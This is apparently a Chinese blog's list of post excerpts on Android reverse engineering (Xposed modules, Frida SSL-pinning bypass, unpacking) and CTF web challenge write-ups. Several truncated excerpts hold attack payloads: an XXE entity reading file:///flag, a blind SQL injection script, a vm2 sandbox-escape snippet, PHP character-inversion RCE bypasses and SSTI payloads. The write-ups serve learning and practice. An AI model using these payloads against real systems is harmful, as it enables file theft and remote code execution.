- 博客(88)
- 收藏
- 关注
RSS订阅原创 android studio2021.3.1 最新xposed模块编写指南
最新的xposed框架已经从xposed到Edxposed再到Lsposed,虽然xposed的api依然是通用的82版本,但现在网上大多数的在android studio上配置xposed的教程已经有点落后了,因此写下这篇来记录自己安装的流程。lsposed如何安装可以看我之前的小米root文章。
2022-10-06 20:56:02
8034
2
原创 手机frida绕过ssl pinning
这一步手机上会向你确认adb要求root权限,可以用magisk管理root权限。绕过ssl pinning的frida脚本如下,用途是在使用fiddler抓包的时候给手机安装了fiddler的证书但是app只信任自己的根证书因此app连不上网或者抓不到https包。下载对应版本的frida-server,现在的手机大多数都是arm64的。电脑上下载adb,手机用USB连到电脑上,打开开发者选项的USB调试。看一下有没有成功连接上,同时还能看到你要hook的app的进程名。电脑端设置一下端口转发。
2022-10-06 19:53:04
1564
原创 小米11刷root记录
机型小米11,安卓12,MIUI13。之前因为包的版本没选对刷完就直接变砖了,还好重新线刷了一个开发版fastboot包救回来了。线刷包可以在这个网站上找到,反正之后刷root也要找对应版本的包这边直接自己刷包就不会搞错版本了。线刷和解bl锁的教程我就不贴了,一个miflash就能搞定。
2022-10-04 20:46:57
2636
原创 fiddler监听手机app
假设电脑的IP地址是192.168.1.106,手机用浏览器访问192.168.1.106:8888,下载fiddler的证书然后安装。Tools——>Options——>Connections,选择Allow remote computers to connect。打开控制面板——>系统和安全——>windows防火墙,在入站规则和出站规则中新建规则,选择端口,允许连接8888端口。fiddler选中Tools——>Options——>HTTPS,勾选上面的选项。如果还是不行可以试试这篇文章里的方法。
2022-09-07 18:19:09
648
原创 雷电模拟器frida脱壳
自动修复功能非常好用,不然dump出的dex是没法直接用jadx打开的。把dex文件放进共享文件夹,然后按文件大小从大到小逐个用MT管理器修复并编辑,查找里面有没有你需要的类
2022-08-06 18:01:51
3734
原创 [CSAWQual 2019]Web_Unagi XXE漏洞 [HarekazeCTF2019]Avatar Uploader 1 finfo_file和getimagesize
[CSAWQual 2019]Web_Unagi看提示有告诉你xml的格式<?xml version='1.0'?><!DOCTYPE users [<!ENTITY xxe SYSTEM "file:///flag" >]><users> <user> <username>bob</username> <password>passwd2</passwor
2022-01-27 17:06:05
2789
原创 [RoarCTF 2019]Online Proxy 盲注
[RoarCTF 2019]Online Proxybp抓包放包,可以用X-Forwarded-For修改IP。last Ip是存在数据库里的,我们先写一个sql注入语句作为IP,然后再修改两次其他的IP。这两次的IP要一样,那么第二次系统就要从数据库中查询last Ip,触发sql注入。盲注:import requestsurl = "http://node4.buuoj.cn:26940//"head = { "GET" : "/ HTTP/1.1", "Cookie" : "trac
2022-01-26 15:45:54
3073
原创 [GYCTF2020]Ez_Express 原型链污染 js大小写特性
[GYCTF2020]Ez_Express随便注册一个账号登录,查看源代码可以发现www.zip的提示下载源码,找到index.jsvar express = require('express');var router = express.Router();const isObject = obj => obj && obj.constructor && obj.constructor === Object;const merge = (a, b) =&g
2022-01-24 14:02:56
774
原创 [安洵杯 2019]不是文件上传
[安洵杯 2019]不是文件上传点开以后是一个图片上传页面,只能上传后缀名是jpg/png的文件。上传结果可以查看源代码,发掘在show.php里,但是里面只有文件名。做到这步没有头绪了,看了writeup才知道是要看github上的源码(#helper.php<?phpclass helper { protected $folder = "pic/"; protected $ifview = False; protected $config = "config.txt"; /
2022-01-23 14:34:54
955
原创 [ISITDTU 2019]EasyPHP php异或绕过减少字符数
[ISITDTU 2019]EasyPHP一个正则绕过,先看正则匹配过滤了什么\x00- (\x20) 过滤了00到20的十六进制字符0-9 过滤了数字’ "`$&.,过滤了这些字符和\x7f字符count_chars模式选为3的话统计字符串里出现过的字符,题目中设置不能超过13(0xd)个但是没有过滤~和^,可以取反和异或绕过。<?phpecho urlencode(~'phpinfo');?>先用_=(~%8F%97%8F%96%91%99%90)();看
2022-01-22 16:08:20
1040
1
原创 [GKCTF 2021]easycms
[GKCTF 2021]easycmsURL加后缀admin.php进入登陆界面题目提示了密码是五位弱口令,那就admin/admin或者admin/12345尝试登录进去以后有两种方法一. 任意文件下载设计——自定义——导出主题——保存下载下来的文件右键复制下载链接http://cfc147be-ed41-45fc-a12f-672318d14a4f.node4.buuoj.cn:81/admin.php?m=ui&f=downloadtheme&theme=L3Zhc
2022-01-21 14:54:17
1696
原创 bestphp‘s revenge SoapClient php处理器反序列化 call_user_func
bestphp’s revenge这道题的知识点还挺多的源码文件有两个:index.php和flag.php<?phphighlight_file(__FILE__);$b = 'implode';call_user_func($_GET['f'], $_POST);session_start();if (isset($_GET['name'])) { $_SESSION['name'] = $_GET['name'];}var_dump($_SESSION);$a =
2021-12-08 16:59:01
611
原创 [b01lers2020]Life on Mars
点击网页左边,bp抓包,可以看到查询语句。/query?search=arabia_terra/**/ORDER/**/BY/**/2初步判断列数是2。在bp里修改URL的话最好对空格进行编码%20,或者用/**/代替再用一下语句查出数据库是aliens/query?search=arabia_terra%20union%20select%201,database()/query?search=arabia_terra%20union%20select%201,group_concat(table
2021-12-08 15:04:33
418
原创 [SUCTF 2018]GetShell 中文字符取反绕过
[SUCTF 2018]GetShellfor i in range (33,126): print("<?php"+chr(i))因为不知道黑名单,先写一个fuzz词典,因为是从第五个字符开始匹配,所以前面填充<?php能用的字符只有{}[]_$~看样子又是无字母数字shell,异或被过滤那就用取反,以下脚本通过汉字字符取反得到英文字符。感谢这位老哥的文章https://xz.aliyun.com/t/8107#toc-6<?phpheader("Content-t
2021-12-06 12:11:53
4981
原创 [强网杯 2019]Upload 反序列化结合文件上传
[强网杯 2019]Uploadwww.tar.gz发现源码,文件还有点大,是把整个工程文件都上传了。用phpstrom打开的话会有断点提示,一处是在Register.php,另一处是在Index.php,是在提示我们用cookie传序列化字符串。重点在Profile.php,毕竟文件上传都是在这里控制的,看到两个魔术方法__call和__get。调用本类中没有的方法触发__call,调用this->{$name},如果本类中也没有这个属性,调用__get。再倒回去看index.php中
2021-12-05 14:01:27
1144
原创 [GYCTF2020]Easyphp php反序列化字符串逃逸+sql
[GYCTF2020]Easyphpwww.zip找到源代码,重点应该在lib.php和update.phpfunction safe($parm){ $array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter"); return str_replace($array,'hacker',$parm);}public function update(){
2021-12-04 18:55:59
3772
原创 [SCTF2019]Flag Shop ruby REB
[GXYCTF2019]StrongestMind计算算式1000次给flag,写一个脚本就行。重点考察正则的使用:from time import sleepimport requestsimport reurl = "http://944c02ef-5777-4072-84fa-3fabe8c45ae9.node4.buuoj.cn:81/index.php"s = requests.session()r = re.compile(r"[0-9]+ [+|-] [0-9]+")r
2021-12-04 12:30:57
548
1
原创 [MRCTF2020]Ezaudit php_mt_seed 伪随机
[MRCTF2020]Ezauditdirsearch扫出来三个文件,访问login.html,,要求我们输入用户名,密码和私钥。用户名从index.php里看出来是crispr,密码用万能密码,主要是这个私钥。<?php header('Content-type:text/html; charset=utf-8');error_reporting(0);if(isset($_POST['login'])){ $username = $_POST['username'];
2021-11-30 19:36:21
385
原创 [HFCTF2020]JustEscape vm沙箱逃逸
[HFCTF2020]JustEscape先用Error().stack测试一下,确定是vm.js这个老哥写的沙箱逃逸https://github.com/patriksimek/vm2/issues/225"use strict";const {VM} = require('vm2');const untrusted = '(' + function(){ TypeError.prototype.get_process = f=>f.constructor("return proces
2021-11-29 12:00:30
584
原创 [BJDCTF2020]EzPHP php绕过 creat_function注入
[BJDCTF2020]EzPHP<?phphighlight_file(__FILE__);error_reporting(0); $file = "1nD3x.php";$shana = $_GET['shana'];$passwd = $_GET['passwd'];$arg = '';$code = '';echo "<br /><font color=red><B>This is a very simple challenge and
2021-11-29 11:07:23
444
原创 [GYCTF2020]EasyThinking Thinkphp6.0任意文件操作漏洞 绕过disable_function
[GYCTF2020]EasyThinking一开始还以为是XSS漏洞,因为搜索记录会被保存。后来查了才知道是Thinkphp 6.0框架的任意文件操作漏洞。先注册一个账号登录,登录时抓包修改Session id为php文件名,长度是32位session文件在/runtime/session/目录下,这是默认的。文件名是sess_加我们刚刚写的32位字符串:sess_0123456789012345678901234567.php。我们可以先来看一下此时这个文件里有什么然后我们搜索一下再看这个文
2021-11-28 17:00:46
2308
原创 [红明谷CTF 2021]write_shell php短标签绕过
[红明谷CTF 2021]write_shell考的是php里的绕过,因为正则过滤了php ; ~ eval等字符,所以php标签<?php?>写入不了https://xz.aliyun.com/t/8107#toc-11这个文章讲绕过讲的挺详细的对于这道题目可以用<?= ?>代替php标签。<?= ?>短标签会直接把php的结果输出,<? ?>的功能则和<?php?>完全一样。过滤空格可以用\t绕过,或者%09也是tab的URL编码。php
2021-11-28 15:39:03
3407
原创 [NPUCTF2020]ezinclude php segment fault特性 PHP_SESSION_UPLOAD_PROGRESS文件包含
[NPUCTF2020]ezinclude如果什么都没传会返回这个Hash值,猜测是name为空时pass的值整挺好,跳出来了flflflflag.php因为直接访问会跳到404页面所以还是得抓包先用filter伪协议读取源文件:/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=index.php返回的是base64编码过的,解码过后得到源码:<html><head><
2021-11-25 10:02:07
371
原创 docker搭建ctf环境
记录一下docker搭建ctf环境和dockerfile的使用我是在kali里搭建的docker,只需要命令sudo apt install docker.io一秒安装systemctl start docker启动docker服务如果你只有题目的源码可以参考这篇https://blog.csdn.net/lhh134/article/details/84873821用docker搭建环境在pull的那一步可能会出现下载速度慢的情况,可以换源。/etc/docker下找daemon.json文件,没
2021-11-07 22:42:54
1599
原创 ctf misc 拼图图片 gaps安装
先贴前辈链接https://blog.csdn.net/qq_45836474/article/details/105353690http://www.ga1axy.top/index.php/archives/6/#gaps%EF%BC%88%E6%8B%BC%E5%9B%BE%EF%BC%89gaps的安装步骤如下:git clone https://github.com/nemanja-m/gaps.gitcd gapspip install -r requirements.txtsud
2021-10-13 13:45:10
5045
3
原创 一天一道ctf 第57天(文件描述符 反弹shell)
[网鼎杯 2020 白虎组]PicDown这题目还挺怪的,?url=/flag直接读取是非预期解正常一步一步做下来是先看/proc/self/cmdline,查看本地使用过的命令,然后/proc/self/cwd/app.py看源码from flask import Flask, Responsefrom flask import render_templatefrom flask import requestimport osimport urllibapp = Flask(__n
2021-08-19 20:20:19
622
原创 一天一道ctf 第55天(controllers/api.js JWT)
审查元素发现是js框架且有app.js文件:看了wp才知道要访问controllers/api.js,行吧就当积累经验了。重点是这里: const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});jwt之前也遇到过了,我们可以抓包一个jwt然后解密出secret。注册一个账号然后登录,拿到令牌。在https://jwt.io/这个网站上可以解析jwt把加密方法改为none,us
2021-08-18 14:31:08
371
原创 一天一道ctf 第56天(ascii偏移盲注)
[GYCTF2020]Ezsqli先用二分法写一个脚本查一下表名,二分法快是快,但就是容易出错,用sleep延缓一下请求速度会好一些。or被过滤了所以informaiton.schema用不了,换成sys.x$schema_flattened_keys。import requestsimport timeurl = "http://7630a861-14ab-4171-bfd2-dff39c2434b9.node4.buuoj.cn:81/"flag = ""payload = "1^(a
2021-08-18 14:17:38
483
原创 一天一道ctf 第52天(二次注入)
[RCTF2015]EasySQL猜是一道二次注入的题目,但是找不到源码,就注册个admin‘/’'测试一下。登录以后可以看到我们输入的用户名原封不动地回显给我们,点击修改密码会报错。可以看到是双引号闭合,确定是二次注入。用报错注入看数据库名,要注意or和空格都被过滤用||和()绕过。admin"||(updatexml(1,concat(0x7e,(select(database())),0x7e),1))#admin"||(updatexml(1,concat(0x7e,(select
2021-08-16 20:41:13
315
原创 一天一道ctf 第53天(GitHack)
[网鼎杯 2018]Commentdirsearch扫目录发现.git泄露,用githack还原git文件。网上lijiejie的那个githack是不能做这道题的,出现如下的GitHack图标的才是真的。git clone git://github.com/BugScanTeam/GitHack直接下载下来的源代码文件是不完整的,进入到扫描目录下git log --refloggit reset --hard e5b2a2443c2b6d395d06960123142bc91123148
2021-08-16 20:34:18
417
原创 一天一道ctf 第54天(GET open任意执行漏洞)
[HITCON 2017]SSRFme<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"]; $s
2021-08-16 20:33:05
379
原创 一天一道ctf 第51天
[CSCCTF 2019 Qual]FlaskLight查看源码有提示,模板注入做的很多了。?search={{7*7}}看一下注入的类型,确定是SSTI注入。因为之前做过类似的题,用的是catch_warnings类,这次想用一样的payload但是好像不行?search= {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.['__glo'+
2021-08-10 11:26:56
109
原创 一天一道ctf 第50天(二次注入)
[CISCN2019 华北赛区 Day1 Web5]CyberPunk查看源代码,可能有文件包含漏洞,直接读取是不行的,要用filter伪协议:?file=php://filter/convert.base64-encode/resource=index.php同样还可以拿到change.php,delete.php,confirm.php的源码。代码审计,可以发现对SQL注入的参数进行了很严的过滤,但既然是题目肯定会给你造漏洞,就找那些过滤方法不一样的参数就行了。user_name和phone都用
2021-08-09 12:41:33
329
原创 一天一道ctf 第49天
查看源码点击image.php?id=1看一下,不一样的id对应了不一样的图片。robots.txt泄露备份文件,image.php.bak查看源码include "config.php";$id=isset($_GET["id"])?$_GET["id"]:"1";$path=isset($_GET["path"])?$_GET["path"]:"";$id=addslashes($id);$path=addslashes($path);$id=str_replace(array.
2021-08-07 17:54:04
157
原创 一天一道ctf 第48天(basename)
[Zer0pts2020]Can you guess it?<?phpinclude 'config.php'; // FLAG is defined in config.phpif (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you read it :)");}if (isset($_GET['
2021-07-30 14:24:51
246
原创 一天一道ctf 第46天(PCRE回溯次数上限)
[FBCTF2019]RCEService这道题只允许输入JSON格式,说白了就是键值对形式。可以{"cmd":"ls"}探测到index.php,但是拿不到源码。网上找了一下原题,很多命令都被过滤,只留了一个‘ls’。<?phpputenv('PATH=/home/rceservice/jail');if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { ech
2021-07-29 16:01:34
782
原创 一天一道ctf 第47天(二分法盲注)
[BSidesCF 2019]Kookie看样子是要我们以admin登录,线索是cookie。只要抓包添加cookie:username=admin就行了(???)[WUSTCTF2020]颜值成绩查询
2021-07-29 16:00:39
285
原创 一天一道ctf 第45天(php伪随机)
[GWCTF 2019]枯燥的抽奖查看源码发现check.php,直接访问获得题目代码2vRheEpPK8<?php#这不是抽奖程序的源代码!不许看!header("Content-Type: text/html;charset=utf-8");session_start();if(!isset($_SESSION['seed'])){$_SESSION['seed']=rand(0,999999999);}mt_srand($_SESSION['seed']);$str_l
2021-07-29 16:00:06
423
1
原创 一天一道ctf 第43天(php字符串异或取反绕过)
[极客大挑战 2019]RCE ME点开题目就是源码<?phperror_reporting(0);if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");
2021-07-24 17:09:59
2450
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人